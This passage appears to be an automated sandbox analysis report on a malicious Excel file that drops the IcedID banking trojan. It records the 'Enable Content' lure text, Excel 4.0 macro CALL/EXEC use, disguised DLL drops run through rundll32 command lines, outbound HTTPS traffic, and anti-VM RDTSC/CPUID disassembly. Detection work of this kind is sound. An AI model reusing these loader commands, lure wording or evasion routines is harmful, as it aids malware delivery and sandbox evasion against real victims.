Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/awscloud
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.jobs/aws
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://www.twitch.tv/aws
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown	HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49172 version: TLS 1.2

E-Banking Fraud:

Yara detected IcedID

Source: Yara match	File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please elk 14 Ru
Source: Screenshot number: 8	Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 8	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15	Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 12	Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU

Found Excel 4.0 Macro with suspicious formulas

Source: document-1251000362.xlsm	Initial sample: CALL
Source: document-1251000362.xlsm	Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Source: document-1251000362.xlsm

Initial sample: Sheet size: 36917

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3	Jump to dropped file

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_003B13B8 NtQuerySystemInformation,RtlAllocateHeap,		3_2_003B13B8
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_002B13B8 NtQuerySystemInformation,RtlAllocateHeap,		7_2_002B13B8

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_003B1100	3_2_003B1100
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000007FEF40E1000	3_2_000007FEF40E1000
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000007FEF40E1979	3_2_000007FEF40E1979
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000007FEF40E1610	3_2_000007FEF40E1610
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_002B1100	7_2_002B1100
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000007FEF46AF93A	7_2_000007FEF46AF93A

Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@11/20@871/6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$document-1251000362.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCCD0.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer

Source: document-1251000362.xlsm

Metadefender: Detection: 13%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/media/image4.png
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3	Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_003B1B94		3_2_003B1B94
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_002B1B94		7_2_002B1B94

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000003B1C52 second address: 00000000003B1C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000003B1C73 second address: 00000000003B1C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F8410A97298h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F8410AD1F7Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F8410AB078Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F8410A97292h 0x0000006d jmp 00007F8410A97292h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F8410AB71FFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000003B1C88 second address: 00000000003B1C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000003B1C95 second address: 00000000003B1C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F8410A97234h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F8410A97298h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F8410AD1F7Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F8410AB078Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F8410A97292h 0x00000073 jmp 00007F8410A97292h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F8410AB71FFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000002B1C52 second address: 00000000002B1C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000002B1C73 second address: 00000000002B1C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F8410A97298h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F8410AD1F7Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F8410AB078Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F8410A97292h 0x0000006d jmp 00007F8410A97292h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F8410AB71FFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000002B1C88 second address: 00000000002B1C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
